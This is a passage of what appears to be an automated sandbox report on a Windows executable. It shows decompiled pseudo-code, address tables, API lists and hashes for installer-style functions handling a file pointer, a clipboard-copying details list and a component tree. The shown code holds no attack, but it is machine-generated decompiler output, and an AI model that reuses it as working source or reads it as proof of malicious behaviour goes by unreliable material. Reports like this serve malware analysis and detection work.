                                                                                                                        • Instruction ID: 4c5c04567c480c11bae84e94003d2882b37cb3083c3cc1db03504fe221b835f3
                                                                                                                        • Opcode Fuzzy Hash: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
                                                                                                                        • Instruction Fuzzy Hash: DAE08631500119BBCF215E619C00A973B5CEB09362F008033FA04E9190D532DB109BA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004031F1, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E004031F1(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                                                        0x004031ff
                                                                                                                        0x00403205

                                                                                                                        APIs
                                                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E9D,?), ref: 004031FF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: FilePointer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 973152223-0
                                                                                                                        • Opcode ID: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
                                                                                                                        • Instruction ID: eafd0aff1283cdec3023edec91852d87283cefa69c9b21bce59c6677f93a42a7
                                                                                                                        • Opcode Fuzzy Hash: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
                                                                                                                        • Instruction Fuzzy Hash: 14B01271644200BFDB214F00DF06F057B21A790701F108030B344380F082712420EB1E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Non-executed Functions

                                                                                                                        Function 00405042, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 95%
                                                                                                                        			E00405042(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				void* _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				int _t94;
				int _t95;
				void* _t101;
				intOrPtr _t122;
				struct HWND__* _t126;
				int _t148;
				int _t149;
				struct HWND__* _t153;
				struct HWND__* _t157;
				struct HMENU__* _t159;
				long _t161;
				void* _t162;
				short* _t163;

				_t153 =  *0x423684;
				_t148 = 0;
				_v8 = _t153;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404FD6, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b || _a12 != _t153) {
								goto L20;
							} else {
								_t87 = SendMessageA(_t153, 0x1004, _t148, _t148);
								_a8 = _t87;
								if(_t87 <= _t148) {
									L37:
									return 0;
								}
								_t159 = CreatePopupMenu();
								AppendMenuA(_t159, _t148, 1, E00405B88(_t148, _t153, _t159, _t148, 0xffffffe1));
								_t92 = _a16;
								if(_t92 != 0xffffffff) {
									_t149 = _t92;
									_t94 = _t92 >> 0x10;
								} else {
									GetWindowRect(_t153,  &_v28);
									_t149 = _v28.left;
									_t94 = _v28.top;
								}
								_t95 = TrackPopupMenu(_t159, 0x180, _t149, _t94, _t148, _a4, _t148);
								_t161 = 1;
								if(_t95 == 1) {
									_v60 = _t148;
									_v48 = 0x4204a0;
									_v44 = 0xfff;
									_a4 = _a8;
									do {
										_a4 = _a4 - 1;
										_t161 = _t161 + SendMessageA(_v8, 0x102d, _a4,  &_v68) + 2;
									} while (_a4 != _t148);
									OpenClipboard(_t148);
									EmptyClipboard();
									_t101 = GlobalAlloc(0x42, _t161);
									_a4 = _t101;
									GlobalFix(_t101);
									_t162 = _t101;
									do {
										_v48 = _t162;
										_t163 = _t162 + SendMessageA(_v8, 0x102d, _t148,  &_v68);
										 *_t163 = 0xa0d;
										_t162 = _t163 + 2;
										_t148 = _t148 + 1;
									} while (_t148 < _a8);
									GlobalUnWire(_a4);
									SetClipboardData(1, _a4);
									CloseClipboard();
								}
								goto L37;
							}
						}
						if( *0x42366c == _t148) {
							ShowWindow( *0x423ea8, 8);
							if( *0x423f2c == _t148) {
								E00404F04( *((intOrPtr*)( *0x41fc70 + 0x34)), _t148);
							}
							E00403EF1(1);
							goto L25;
						}
						 *0x41f868 = 2;
						E00403EF1(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00403F7F(_a8, _a12, _a16);
						}
						ShowWindow( *0x423670, _t148);
						ShowWindow(_t153, 8);
						E00403F4D(_t153);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t122 =  *0x423eb0;
				_a8 =  *((intOrPtr*)(_t122 + 0x5c));
				_a12 =  *((intOrPtr*)(_t122 + 0x60));
				 *0x423670 = GetDlgItem(_a4, 0x403);
				 *0x423668 = GetDlgItem(_a4, 0x3ee);
				_t126 = GetDlgItem(_a4, 0x3f8);
				 *0x423684 = _t126;
				_v8 = _t126;
				E00403F4D( *0x423670);
				 *0x423674 = E004047A6(4);
				 *0x42368c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t148) {
					SendMessageA(_v8, 0x1024, _t148, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403F18(_a4);
				if(( *0x423eb8 & 0x00000003) != 0) {
					ShowWindow( *0x423670, _t148);
					if(( *0x423eb8 & 0x00000002) != 0) {
						 *0x423670 = _t148;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403F4D( *0x423668);
				}
				_t157 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t157, 0x401, _t148, 0x75300000);
				if(( *0x423eb8 & 0x00000004) != 0) {
					SendMessageA(_t157, 0x409, _t148, _a12);
					SendMessageA(_t157, 0x2001, _t148, _a8);
				}
				goto L37;
			}
































                                                                                                                        0x0040504b
                                                                                                                        0x00405051
                                                                                                                        0x0040505a
                                                                                                                        0x0040505d
                                                                                                                        0x004051f5
                                                                                                                        0x00405219
                                                                                                                        0x00405219
                                                                                                                        0x0040522c
                                                                                                                        0x0040524a
                                                                                                                        0x00405251
                                                                                                                        0x004052a8
                                                                                                                        0x004052ac
                                                                                                                        0x00000000
                                                                                                                        0x004052b3
                                                                                                                        0x004052bb
                                                                                                                        0x004052c3
                                                                                                                        0x004052c6
                                                                                                                        0x004053bf
                                                                                                                        0x00000000
                                                                                                                        0x004053bf
                                                                                                                        0x004052d5
                                                                                                                        0x004052e1
                                                                                                                        0x004052e7
                                                                                                                        0x004052ed
                                                                                                                        0x00405302
                                                                                                                        0x00405308
                                                                                                                        0x004052ef
                                                                                                                        0x004052f4
                                                                                                                        0x004052fa
                                                                                                                        0x004052fd
                                                                                                                        0x004052fd
                                                                                                                        0x00405318
                                                                                                                        0x00405320
                                                                                                                        0x00405323
                                                                                                                        0x0040532c
                                                                                                                        0x0040532f
                                                                                                                        0x00405336
                                                                                                                        0x0040533d
                                                                                                                        0x00405345
                                                                                                                        0x00405345
                                                                                                                        0x0040535c
                                                                                                                        0x0040535c
                                                                                                                        0x00405363
                                                                                                                        0x00405369
                                                                                                                        0x00405372
                                                                                                                        0x00405379
                                                                                                                        0x0040537c
                                                                                                                        0x00405382
                                                                                                                        0x00405384
                                                                                                                        0x00405387
                                                                                                                        0x00405396
                                                                                                                        0x00405398
                                                                                                                        0x0040539e
                                                                                                                        0x0040539f
                                                                                                                        0x004053a0
                                                                                                                        0x004053a8
                                                                                                                        0x004053b3
                                                                                                                        0x004053b9
                                                                                                                        0x004053b9
                                                                                                                        0x00000000
                                                                                                                        0x00405323
                                                                                                                        0x004052ac
                                                                                                                        0x00405259
                                                                                                                        0x00405289
                                                                                                                        0x00405291
                                                                                                                        0x0040529c
                                                                                                                        0x0040529c
                                                                                                                        0x004052a3
                                                                                                                        0x00000000
                                                                                                                        0x004052a3
                                                                                                                        0x0040525d
                                                                                                                        0x00405267
                                                                                                                        0x00000000
                                                                                                                        0x0040522e
                                                                                                                        0x00405234
                                                                                                                        0x0040526c
                                                                                                                        0x00000000
                                                                                                                        0x00405275
                                                                                                                        0x0040523d
                                                                                                                        0x00405242
                                                                                                                        0x00405245
                                                                                                                        0x00000000
                                                                                                                        0x00405245
                                                                                                                        0x0040522c
                                                                                                                        0x00405063
                                                                                                                        0x00405067
                                                                                                                        0x00405070
                                                                                                                        0x00405077
                                                                                                                        0x0040507a
                                                                                                                        0x0040507d
                                                                                                                        0x00405080
                                                                                                                        0x00405081
                                                                                                                        0x00405082
                                                                                                                        0x0040509b
                                                                                                                        0x0040509e
                                                                                                                        0x004050a8
                                                                                                                        0x004050b7
                                                                                                                        0x004050bf
                                                                                                                        0x004050c7
                                                                                                                        0x004050cc
                                                                                                                        0x004050cf
                                                                                                                        0x004050db
                                                                                                                        0x004050e4
                                                                                                                        0x004050ed
                                                                                                                        0x00405110
                                                                                                                        0x00405116
                                                                                                                        0x00405127
                                                                                                                        0x0040512c
                                                                                                                        0x0040513a
                                                                                                                        0x00405148
                                                                                                                        0x00405148
                                                                                                                        0x0040514d
                                                                                                                        0x0040515b
                                                                                                                        0x0040515b
                                                                                                                        0x00405160
                                                                                                                        0x00405163
                                                                                                                        0x00405168
                                                                                                                        0x00405174
                                                                                                                        0x0040517d
                                                                                                                        0x0040518a
                                                                                                                        0x00405199
                                                                                                                        0x0040518c
                                                                                                                        0x00405191
                                                                                                                        0x00405191
                                                                                                                        0x004051a5
                                                                                                                        0x004051a5
                                                                                                                        0x004051b9
                                                                                                                        0x004051c2
                                                                                                                        0x004051cb
                                                                                                                        0x004051db
                                                                                                                        0x004051e7
                                                                                                                        0x004051e7
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32 ref: 004050A1
                                                                                                                        • GetDlgItem.USER32 ref: 004050B0
                                                                                                                        • GetClientRect.USER32 ref: 004050ED
                                                                                                                        • GetSystemMetrics.USER32 ref: 004050F5
                                                                                                                        • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405116
                                                                                                                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405127
                                                                                                                        • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 0040513A
                                                                                                                        • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00405148
                                                                                                                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040515B
                                                                                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040517D
                                                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405191
                                                                                                                        • GetDlgItem.USER32 ref: 004051B2
                                                                                                                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004051C2
                                                                                                                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004051DB
                                                                                                                        • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 004051E7
                                                                                                                        • GetDlgItem.USER32 ref: 004050BF
                                                                                                                          • Part of subcall function 00403F4D: SendMessageA.USER32(00000028,?,00000001,00403D7E), ref: 00403F5B
                                                                                                                        • GetDlgItem.USER32 ref: 00405204
                                                                                                                        • CreateThread.KERNEL32 ref: 00405212
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00405219
                                                                                                                        • ShowWindow.USER32(00000000), ref: 0040523D
                                                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405242
                                                                                                                        • ShowWindow.USER32(00000008), ref: 00405289
                                                                                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052BB
                                                                                                                        • CreatePopupMenu.USER32 ref: 004052CC
                                                                                                                        • AppendMenuA.USER32 ref: 004052E1
                                                                                                                        • GetWindowRect.USER32 ref: 004052F4
                                                                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405318
                                                                                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405353
                                                                                                                        • OpenClipboard.USER32(00000000), ref: 00405363
                                                                                                                        • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405369
                                                                                                                        • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405372
                                                                                                                        • GlobalFix.KERNEL32(00000000), ref: 0040537C
                                                                                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405390
                                                                                                                        • GlobalUnWire.KERNEL32 ref: 004053A8
                                                                                                                        • SetClipboardData.USER32 ref: 004053B3
                                                                                                                        • CloseClipboard.USER32 ref: 004053B9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleMetricsOpenSystemThreadTrackWire
                                                                                                                        • String ID: {
                                                                                                                        • API String ID: 1854847162-366298937
                                                                                                                        • Opcode ID: b02f2e9079c5817fef39b267f28514b86047bb53c7fcbf471c402ec640d3569d
                                                                                                                        • Instruction ID: b28aa7ce0402c6385ba5b6cd868a6258f1d07b471923b7bae974b2a68da01879
                                                                                                                        • Opcode Fuzzy Hash: b02f2e9079c5817fef39b267f28514b86047bb53c7fcbf471c402ec640d3569d
                                                                                                                        • Instruction Fuzzy Hash: 34A14870904208FFDB219F60DD89AAE7F79FB08355F00417AFA05BA2A0C7795A41DF69
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00404853, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMONCrypto
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 90%
                                                                                                                        			E00404853(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				long _t202;
				signed int _t206;
				signed int _t217;
				long _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				struct HBITMAP__* _t250;
				long _t251;
				long _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				intOrPtr _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423ec8;
				_t320 =  *0x407244;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x423eb0 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x423eb9 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E004047D3(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x423eb8) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x42047c;
								if(_t220 != _t315) {
									 *0x40702c(_t220);
								}
								_t221 =  *0x420494;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x42047c = _t315;
								 *0x420494 = _t315;
								 *0x423f00 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x423eb9 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E0040140B(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x420494;
									_t196 =  *0x423ec8;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x423ecc <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										if( *((intOrPtr*)( *0x42367c + 0x10)) != _t315) {
											E004046F1(0x3ff, 0xfffffffb, E004047A6(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x423ecc);
									goto L84;
								} else {
									_t282 = E004012E2( *0x420494);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x423f00 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x420494 = GlobalAlloc(0x40,  *0x423ecc << 2);
					_t250 = LoadBitmapA( *0x423ea0, 0x6e);
					 *0x420488 =  *0x420488 | 0xffffffff;
					_v24 = _t250;
					_t251 = SetWindowLongA(_v8, 0xfffffffc, E00404E54);
					 *0x420490 = _t251;
					_t252 =  *0x407034(0x10, 0x10, 0x21, 6, 0);
					 *0x42047c = _t252;
					 *0x407028(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x42047c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405B88(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403F18(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403F18(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x423ecc <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x420494 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x420494 + _t318 * 4) = _t274;
									_t288 =  *( *0x420494 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x423ecc);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403F4D(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403F4D(_v12);
								L89:
								return E00403F7F(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}



























































                                                                                                                        0x00404871
                                                                                                                        0x00404877
                                                                                                                        0x00404879
                                                                                                                        0x0040487f
                                                                                                                        0x00404885
                                                                                                                        0x00404892
                                                                                                                        0x0040489b
                                                                                                                        0x0040489e
                                                                                                                        0x004048a1
                                                                                                                        0x00404ac9
                                                                                                                        0x00404ad0
                                                                                                                        0x00404ae4
                                                                                                                        0x00404ad2
                                                                                                                        0x00404ad4
                                                                                                                        0x00404ad7
                                                                                                                        0x00404ad8
                                                                                                                        0x00404adf
                                                                                                                        0x00404adf
                                                                                                                        0x00404af0
                                                                                                                        0x00404afe
                                                                                                                        0x00404b01
                                                                                                                        0x00404b17
                                                                                                                        0x00404b8f
                                                                                                                        0x00404b92
                                                                                                                        0x00404b94
                                                                                                                        0x00404b9e
                                                                                                                        0x00404bac
                                                                                                                        0x00404bac
                                                                                                                        0x00404bae
                                                                                                                        0x00404bb8
                                                                                                                        0x00404bbe
                                                                                                                        0x00404bdf
                                                                                                                        0x00404bc0
                                                                                                                        0x00404bcd
                                                                                                                        0x00404bcd
                                                                                                                        0x00404bbe
                                                                                                                        0x00404bb8
                                                                                                                        0x00000000
                                                                                                                        0x00404b92
                                                                                                                        0x00404b1c
                                                                                                                        0x00404b27
                                                                                                                        0x00404b2c
                                                                                                                        0x00404b33
                                                                                                                        0x00404b3a
                                                                                                                        0x00404b44
                                                                                                                        0x00404b44
                                                                                                                        0x00404b48
                                                                                                                        0x00404b4d
                                                                                                                        0x00404b52
                                                                                                                        0x00404b68
                                                                                                                        0x00404b54
                                                                                                                        0x00404b54
                                                                                                                        0x00404b5c
                                                                                                                        0x00404b63
                                                                                                                        0x00404b5e
                                                                                                                        0x00404b5e
                                                                                                                        0x00404b5e
                                                                                                                        0x00404b5c
                                                                                                                        0x00404b6c
                                                                                                                        0x00404b6e
                                                                                                                        0x00404b7c
                                                                                                                        0x00404b7d
                                                                                                                        0x00404b89
                                                                                                                        0x00404b8c
                                                                                                                        0x00404b8c
                                                                                                                        0x00404b4d
                                                                                                                        0x00000000
                                                                                                                        0x00404b3a
                                                                                                                        0x00404b1e
                                                                                                                        0x00404b25
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00404be2
                                                                                                                        0x00404be2
                                                                                                                        0x00404be9
                                                                                                                        0x00404c5d
                                                                                                                        0x00404c64
                                                                                                                        0x00404c70
                                                                                                                        0x00404c70
                                                                                                                        0x00404c79
                                                                                                                        0x00404c7b
                                                                                                                        0x00404c82
                                                                                                                        0x00404c85
                                                                                                                        0x00404c85
                                                                                                                        0x00404c8b
                                                                                                                        0x00404c92
                                                                                                                        0x00404c95
                                                                                                                        0x00404c95
                                                                                                                        0x00404c9b
                                                                                                                        0x00404ca1
                                                                                                                        0x00404ca7
                                                                                                                        0x00404ca7
                                                                                                                        0x00404cb4
                                                                                                                        0x00404e01
                                                                                                                        0x00404e08
                                                                                                                        0x00404e25
                                                                                                                        0x00404e2b
                                                                                                                        0x00404e3d
                                                                                                                        0x00404e3d
                                                                                                                        0x00000000
                                                                                                                        0x00404cba
                                                                                                                        0x00404cbc
                                                                                                                        0x00404cc4
                                                                                                                        0x00404cc8
                                                                                                                        0x00404cc8
                                                                                                                        0x00404cd0
                                                                                                                        0x00404d11
                                                                                                                        0x00404d13
                                                                                                                        0x00404d23
                                                                                                                        0x00404d26
                                                                                                                        0x00404d2b
                                                                                                                        0x00404d32
                                                                                                                        0x00404d35
                                                                                                                        0x00404dd7
                                                                                                                        0x00404ddd
                                                                                                                        0x00404deb
                                                                                                                        0x00404dfc
                                                                                                                        0x00404dfc
                                                                                                                        0x00000000
                                                                                                                        0x00404deb
                                                                                                                        0x00404d3b
                                                                                                                        0x00404d3e
                                                                                                                        0x00404d44
                                                                                                                        0x00404d49
                                                                                                                        0x00404d4b
                                                                                                                        0x00404d4d
                                                                                                                        0x00404d53
                                                                                                                        0x00404d5a
                                                                                                                        0x00404d5f
                                                                                                                        0x00404d66
                                                                                                                        0x00404d69
                                                                                                                        0x00404d69
                                                                                                                        0x00404d70
                                                                                                                        0x00404d7c
                                                                                                                        0x00404d80
                                                                                                                        0x00404d82
                                                                                                                        0x00404d82
                                                                                                                        0x00404d72
                                                                                                                        0x00404d74
                                                                                                                        0x00404d74
